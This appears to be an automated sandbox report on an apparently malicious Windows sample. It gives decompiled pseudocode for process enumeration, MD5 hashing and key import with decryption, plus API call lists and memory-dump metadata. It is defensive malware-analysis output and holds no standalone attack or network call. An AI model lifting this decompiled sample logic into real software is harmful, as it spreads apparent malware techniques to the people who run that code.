                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                          				long _v284;
                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                          				void* _v308;
                                                                                                                                                                                                                                                                          				void* _v312;
                                                                                                                                                                                                                                                                          				long _v316;
                                                                                                                                                                                                                                                                          				long _v320;
                                                                                                                                                                                                                                                                          				void* _v324;
                                                                                                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                                                                                                          				int _v332;
                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                          				_v312 = _t44;
                                                                                                                                                                                                                                                                          				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v308 = 0x128;
                                                                                                                                                                                                                                                                          				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					CloseHandle(_v312);
                                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                                                                          				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                          					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                          					if(_t50 != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                          					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                          							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                          							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                          							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                          							if(_v324 != 0) {
                                                                                                                                                                                                                                                                          								_v332 = 0;
                                                                                                                                                                                                                                                                          								_push( &_v332);
                                                                                                                                                                                                                                                                          								_push(4);
                                                                                                                                                                                                                                                                          								_push( &_v328);
                                                                                                                                                                                                                                                                          								_t61 = _v324;
                                                                                                                                                                                                                                                                          								_push(_t61); // executed
                                                                                                                                                                                                                                                                          								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v324); // executed
                                                                                                                                                                                                                                                                          									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v328);
                                                                                                                                                                                                                                                                          									_push(_v324);
                                                                                                                                                                                                                                                                          									L0400B1CE();
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v316 = _v284;
                                                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04001ca9
                                                                                                                                                                                                                                                                          0x04001cb1
                                                                                                                                                                                                                                                                          0x04001cb6
                                                                                                                                                                                                                                                                          0x04001cc3
                                                                                                                                                                                                                                                                          0x04001e51
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001cc9
                                                                                                                                                                                                                                                                          0x04001ce1
                                                                                                                                                                                                                                                                          0x04001ce8
                                                                                                                                                                                                                                                                          0x04001e44
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x04001cf4
                                                                                                                                                                                                                                                                          0x04001cfa
                                                                                                                                                                                                                                                                          0x04001d04
                                                                                                                                                                                                                                                                          0x04001d2e
                                                                                                                                                                                                                                                                          0x04001d35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d37
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d5f
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x04001d81
                                                                                                                                                                                                                                                                          0x04001d92
                                                                                                                                                                                                                                                                          0x04001dac
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001dbb
                                                                                                                                                                                                                                                                          0x04001dcb
                                                                                                                                                                                                                                                                          0x04001dcc
                                                                                                                                                                                                                                                                          0x04001dd4
                                                                                                                                                                                                                                                                          0x04001dd5
                                                                                                                                                                                                                                                                          0x04001ddb
                                                                                                                                                                                                                                                                          0x04001ddc
                                                                                                                                                                                                                                                                          0x04001de3
                                                                                                                                                                                                                                                                          0x04001e05
                                                                                                                                                                                                                                                                          0x04001e09
                                                                                                                                                                                                                                                                          0x04001e10
                                                                                                                                                                                                                                                                          0x04001e11
                                                                                                                                                                                                                                                                          0x04001de5
                                                                                                                                                                                                                                                                          0x04001de8
                                                                                                                                                                                                                                                                          0x04001dec
                                                                                                                                                                                                                                                                          0x04001df3
                                                                                                                                                                                                                                                                          0x04001dfa
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001e16
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001e27
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d18
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t37;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                                                                                          							_t39 = _a8;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                          							if(_t39 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_v28 = 4;
                                                                                                                                                                                                                                                                          								_t41 =  &_v28;
                                                                                                                                                                                                                                                                          								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                          								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                          									_v32 = _a16;
                                                                                                                                                                                                                                                                          									_t43 = _a12;
                                                                                                                                                                                                                                                                          									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                                                                          										_v8 = _v32;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                          0x04008bb6
                                                                                                                                                                                                                                                                          0x04008bc1
                                                                                                                                                                                                                                                                          0x04008ce7
                                                                                                                                                                                                                                                                          0x04008ced
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008bf5
                                                                                                                                                                                                                                                                          0x04008bff
                                                                                                                                                                                                                                                                          0x04008c07
                                                                                                                                                                                                                                                                          0x04008c09
                                                                                                                                                                                                                                                                          0x04008c0f
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c2d
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c42
                                                                                                                                                                                                                                                                          0x04008c59
                                                                                                                                                                                                                                                                          0x04008c61
                                                                                                                                                                                                                                                                          0x04008c65
                                                                                                                                                                                                                                                                          0x04008c71
                                                                                                                                                                                                                                                                          0x04008c79
                                                                                                                                                                                                                                                                          0x04008c7b
                                                                                                                                                                                                                                                                          0x04008c82
                                                                                                                                                                                                                                                                          0x04008c8b
                                                                                                                                                                                                                                                                          0x04008c99
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cae
                                                                                                                                                                                                                                                                          0x04008cb7
                                                                                                                                                                                                                                                                          0x04008cc1
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008c42

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                                          								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x04008a76
                                                                                                                                                                                                                                                                          0x04008a81
                                                                                                                                                                                                                                                                          0x04008ba3
                                                                                                                                                                                                                                                                          0x04008ba9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ac9
                                                                                                                                                                                                                                                                          0x04008ad3
                                                                                                                                                                                                                                                                          0x04008adb
                                                                                                                                                                                                                                                                          0x04008ae3
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b01
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b16
                                                                                                                                                                                                                                                                          0x04008b1c
                                                                                                                                                                                                                                                                          0x04008b37
                                                                                                                                                                                                                                                                          0x04008b3f
                                                                                                                                                                                                                                                                          0x04008b41
                                                                                                                                                                                                                                                                          0x04008b66
                                                                                                                                                                                                                                                                          0x04008b80
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008b16

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000104E
                                                                                                                                                                                                                                                                            • Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1), ref: 10001096
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
